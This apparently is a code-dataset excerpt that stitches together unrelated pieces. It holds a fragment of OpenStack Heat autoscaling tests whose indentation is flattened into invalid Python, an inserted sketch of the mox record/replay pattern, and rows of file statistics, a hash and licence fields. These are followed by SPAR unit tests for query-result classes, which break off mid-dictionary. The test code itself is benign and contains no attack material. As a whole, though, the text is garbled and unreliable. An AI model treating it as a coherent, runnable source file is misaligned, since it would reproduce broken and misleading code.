up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now trigger another scale-up without changing time, should work
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
        #stub for the metadata accesses while creating the additional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_update(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create initial scaling policy
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Update scaling policy
update_snippet = copy.deepcopy(up_policy.parsed_template())
update_snippet['Properties']['ScalingAdjustment'] = '2'
scheduler.TaskRunner(up_policy.update, update_snippet)()
self.assertEqual('2',
up_policy.properties['ScalingAdjustment'])
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(4, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 2', 2)
self._stub_create(2)
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2', 'WebServerGroup-3'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx']
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
instances = rsrc.get_instances()
self.assertEqual(1, len(instances))
self.assertEqual('xxxx', instances[0].properties['SubnetId'])
rsrc.delete()
self.m.VerifyAll()
def test_invalid_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx', 'yyyy']
stack = utils.parse_stack(t, params=self.params)
self.assertRaises(exception.NotSupported, self.create_scaling_group, t,
stack, 'WebServerGroup')
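The tests above all follow the same mox record/replay/verify cycle; a condensed, Heat-independent sketch of that pattern, where the Collaborator class is purely illustrative:

import mox

class Collaborator(object):
    def fetch(self):
        raise RuntimeError('the real implementation must never run in a test')

m = mox.Mox()
m.StubOutWithMock(Collaborator, 'fetch')
Collaborator.fetch().AndReturn('stubbed value')    # record the expected call
m.ReplayAll()                                      # switch from record to replay mode
assert Collaborator().fetch() == 'stubbed value'   # code under test triggers the call
m.VerifyAll()                                      # fail if any expectation was unmet
m.UnsetStubs()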
| 39.056203
| 79
| 0.624607
| 6,031
| 56,983
| 5.695904
| 0.064666
| 0.025035
| 0.027306
| 0.036097
| 0.857767
| 0.836254
| 0.822689
| 0.802428
| 0.78403
| 0.757103
| 0
| 0.012207
| 0.256726
| 56,983
| 1,458
| 80
| 39.08299
| 0.798862
| 0.06716
| 0
| 0.773585
| 0
| 0
| 0.156725
| 0.026027
| 0
| 0
| 0
| 0
| 0.101527
| 1
| 0.036837
| false
| 0
| 0.018868
| 0
| 0.060198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12351a8b8ca417fc83e09eba6999e4a299846cd3
| 37,650
|
py
|
Python
|
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 37
|
2017-06-09T13:55:23.000Z
|
2022-01-28T12:51:17.000Z
|
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | null | null | null |
spar_python/query_generation/query_result_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 5
|
2017-06-09T13:55:26.000Z
|
2021-11-11T03:51:56.000Z
|
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: jill
# Description: Tests for the query results classes
# *****************************************************************
import os
import sys
this_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = os.path.join(this_dir, '..', '..')
sys.path.append(base_dir)
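# Make the spar_python packages importable when this test is run directly.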
import spar_python.query_generation.query_schema as qs
import spar_python.report_generation.ta1.ta1_schema as rdb
import spar_python.report_generation.ta1.ta1_database as ta1_database
import spar_python.query_generation.query_result as qr
import spar_python.query_generation.query_ids as qids
import unittest
class SelectStarTest(unittest.TestCase):
def setUp(self):
self.__query = { qs.QRY_CAT : 'eq',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : 'fname = nick',
qs.QRY_FIELD : 'FNAME',
qs.QRY_FIELDTYPE : 'string',
qs.QRY_VALUE : 'nick' }
self.__result = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
def testQueryResult(self):
qids.reset_full_qid_seen()
count = 0
for x in xrange(10):
self.__query[qs.QRY_QID]=x
query_result = qr.EqualityQueryResult(self.__query, self.__result,
None, True)
(_, full_entry, _, _) = query_result.process_query()
if full_entry[rdb.DBF_SELECTSTAR]:
count += 1
self.assertEqual(count,2)
def testPreWriteToFullTable(self):
qids.reset_full_qid_seen()
count = 0
for x in xrange(10):
self.__query[qs.QRY_QID]=x
full_entry= qr.QueryResultBase._pre_write_to_full_table(self.__query,
self.__result)
if full_entry[rdb.DBF_SELECTSTAR]:
count +=1
self.assertEqual(count,2)
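# Both tests above expect exactly 2 of the 10 generated full-table entries to
# be flagged DBF_SELECTSTAR after reset_full_qid_seen(), i.e. the select-star
# decision is reproducible for a fixed sequence of query ids.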
class EqualityQueryResultTest(unittest.TestCase):
"""
Test that the EqualityQueryResult class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'eq',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : 'fname = nick',
qs.QRY_FIELD : 'FNAME',
qs.QRY_FIELDTYPE : 'string',
qs.QRY_VALUE : 'nick' }
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2 }
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]),
rdb.DBF_SELECTSTAR : True }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
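# The *_no_matches variants built above mirror the expected entries when the
# result argument is None; they are compared against in the second half of
# test_process_query below.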
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.EqualityQueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.EqualityQueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.EqualityQueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P2QueryResultTest(unittest.TestCase):
"""
Test that the P2QueryResult class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'P2',
qs.QRY_SUBCAT : 'foorange',
qs.QRY_DBNUMRECORDS : 3,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
qs.QRY_WHERECLAUSE : '100 <= foo <= 500',
qs.QRY_FIELD : 'foo',
qs.QRY_FIELDTYPE : 'integer',
qs.QRY_LBOUND : 100,
qs.QRY_UBOUND : 500,
qs.QRY_RANGE : 4,
qs.QRY_RANGECOVERAGE : 400}
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2,
rdb.DBA_RANGE : 4}
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_SELECTSTAR : True,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]) }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.P2QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P2QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P2QueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P2QueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P3P4P6P7QueryResultTest(unittest.TestCase):
"""
Test that the P3P4P6P7QueryResult class acts as expected.
"""
def setUp(self):
''' setup for test '''
query1 = { qs.QRY_CAT : 'P3',
qs.QRY_SUBCAT : '',
qs.QRY_DBNUMRECORDS : 3,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_PERF : ['LL'],
qs.QRY_QID : 1,
qs.QRY_WHERECLAUSE : "CONTAINED_IN(notes1, ''dog\''')",
qs.QRY_FIELD : 'notes1',
qs.QRY_FIELDTYPE : 'text',
qs.QRY_SEARCHFOR : 'dogs',
qs.QRY_KEYWORDLEN : 4 }
result1 = { qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
self.__query1 = query1
self.__result1 = result1
self.__query1_atomic_entry = \
{ rdb.DBA_AQID : query1[qs.QRY_QID],
rdb.DBA_CAT : query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 2,
rdb.DBA_KEYWORDLEN : query1[qs.QRY_KEYWORDLEN]}
self.__query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 2,
rdb.DBF_SELECTSTAR : True,
rdb.DBF_MATCHINGRECORDIDS : set([1, 3]) }
self.__query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.__query1_atomic_entry_no_matches = dict(self.__query1_atomic_entry)
self.__query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches = dict(self.__query1_full_entry)
self.__query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.__query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = set()
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.P3P4P6P7QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry)
self.assertEqual(full_entry, self.__query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P3P4P6P7QueryResult(self.__query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.__query1_atomic_entry_no_matches)
self.assertEqual(full_entry, self.__query1_full_entry_no_matches)
self.assertEqual(full_to_atomic_entry,
self.__query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P3P4P6P7QueryResult(self.__query1, self.__result1,
None, True)
self.assertEqual(query_result._query, self.__query1)
self.assertEqual(query_result._result, self.__result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class P9AlarmQueryResultTest(unittest.TestCase):
"""
Test that the P9AlarmQueryResult class acts as expected.
"""
def setUp(self):
''' setup for test '''
self.query1 = { qs.QRY_QID : 1,
qs.QRY_DBNUMRECORDS : 1000,
qs.QRY_DBRECORDSIZE : 100,
qs.QRY_CAT : 'P9',
qs.QRY_PERF : ['LL'],
qs.QRY_ENUM : qs.CAT.P9_ALARM_WORDS,
qs.QRY_SUBCAT : "alarmwords",
qs.QRY_WHERECLAUSE : "alarm_words_distance(''outgrabe'', ''raths'') < 50",
qs.QRY_FIELD : 'notes3',
qs.QRY_NEGATE : False,
qs.QRY_FIELDTYPE : 'string',
qs.QRY_LRSS : 1,
qs.QRY_URSS : 10,
qs.QRY_ALARMWORDONE : 'outgrabe',
qs.QRY_ALARMWORDTWO : 'raths',
qs.QRY_ALARMWORDDISTANCE : 50}
self.result1 = {'matching_record_counts': '1|1|2|2',
'qid': 1,
'alarmword_matching_row_id_and_distances':
[(1, 22), (2, 19), (3, 50),
(4, 25), (5, 25), (6, 50)],
'matching_record_ids': [2,1,4,5,3,6]}
self.query1_atomic_entry = \
{ rdb.DBA_AQID : self.query1[qs.QRY_QID],
rdb.DBA_CAT : self.query1[qs.QRY_CAT],
rdb.DBA_SUBCAT : self.query1[qs.QRY_SUBCAT],
rdb.DBA_NUMRECORDS : self.query1[qs.QRY_DBNUMRECORDS],
rdb.DBA_RECORDSIZE : self.query1[qs.QRY_DBRECORDSIZE],
rdb.DBA_WHERECLAUSE : self.query1[qs.QRY_WHERECLAUSE],
rdb.DBA_FIELD : self.query1[qs.QRY_FIELD],
rdb.DBA_FIELDTYPE : self.query1[qs.QRY_FIELDTYPE],
rdb.DBA_NUMMATCHINGRECORDS : 6 }
self.query1_full_entry = \
{ rdb.DBF_FQID : 1,
rdb.DBF_CAT : self.query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : self.query1[qs.QRY_SUBCAT],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self.query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self.query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self.query1[qs.QRY_PERF],
rdb.DBF_NUMRECORDS : self.query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : self.query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self.query1[qs.QRY_WHERECLAUSE],
rdb.DBF_NUMMATCHINGRECORDS : 6,
rdb.DBF_MATCHINGRECORDIDS : [2,1,4,5,3,6],
rdb.DBF_SELECTSTAR : True,
rdb.DBF_P9MATCHINGRECORDCOUNTS : '1|1|2|2' }
self.query1_full_to_atomic_entry = \
{ rdb.F2A_AQID : 1, rdb.F2A_FQID : 1 }
# no matches
self.query1_atomic_entry_no_matches = dict(self.query1_atomic_entry)
self.query1_atomic_entry_no_matches[rdb.DBA_NUMMATCHINGRECORDS] = 0
self.query1_full_entry_no_matches = dict(self.query1_full_entry)
self.query1_full_entry_no_matches[rdb.DBF_NUMMATCHINGRECORDS] = 0
self.query1_full_entry_no_matches[rdb.DBF_MATCHINGRECORDIDS] = []
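# Unlike the other categories, the P9 alarm-word result carries ordered
# matching record ids plus per-row distances and a '1|1|2|2'
# matching_record_counts string, so the expected full-table entry stores a
# list (not a set) of record ids.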
def test_process_repeat_query(self):
''' test process_query with repeats'''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.query1_atomic_entry)
self.assertEqual(full_entry, self.query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
# test again but pass in None for results
query_result = qr.P9AlarmQueryResult(self.query1, None,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
self.assertEqual(atomic_entry, {})
self.assertEqual(full_entry, {})
self.assertEqual(full_to_atomic_entry, {})
self.assertEqual(full_to_full_entry, {})
def test_process_query(self):
''' test process_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
(atomic_entry, full_entry, full_to_atomic_entry, full_to_full_entry) = \
query_result.process_query()
full_entry[rdb.DBF_SELECTSTAR]=True
self.assertEqual(atomic_entry, self.query1_atomic_entry)
self.assertEqual(full_entry, self.query1_full_entry)
self.assertEqual(full_to_atomic_entry,
self.query1_full_to_atomic_entry)
self.assertEqual(full_to_full_entry, {})
def test_write_query(self):
''' test write_query '''
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
db_object, True)
query_result.write_query()
db_object.close()
def test_init_method(self):
''' test __init__ method '''
query_result = qr.P9AlarmQueryResult(self.query1, self.result1,
None, True)
self.assertEqual(query_result._query, self.query1)
self.assertEqual(query_result._result, self.result1)
self.assertEqual(query_result._top, True)
self.assertEqual(query_result._db_object, None)
class StaticMethodsTest(unittest.TestCase):
"""
Test that the QueryResultBase static methods act as expected.
"""
def setUp(self):
''' setup for test '''
self._query1 = { qs.QRY_CAT : 'P1',
qs.QRY_SUBCAT : 'eq_and',
qs.QRY_ENUM : qs.CAT.P1_EQ_AND,
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 1,
qs.QRY_PERF : ['LL'],
